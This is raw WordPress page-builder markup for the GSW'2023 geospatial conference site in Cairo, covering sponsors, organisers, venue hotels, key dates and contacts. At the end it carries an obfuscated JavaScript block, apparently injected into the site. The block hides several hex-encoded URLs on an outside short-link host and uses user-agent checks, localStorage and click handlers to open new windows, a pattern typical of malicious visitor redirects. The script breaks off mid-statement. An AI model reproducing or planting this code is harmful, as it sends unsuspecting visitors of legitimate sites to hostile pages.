/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"25\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 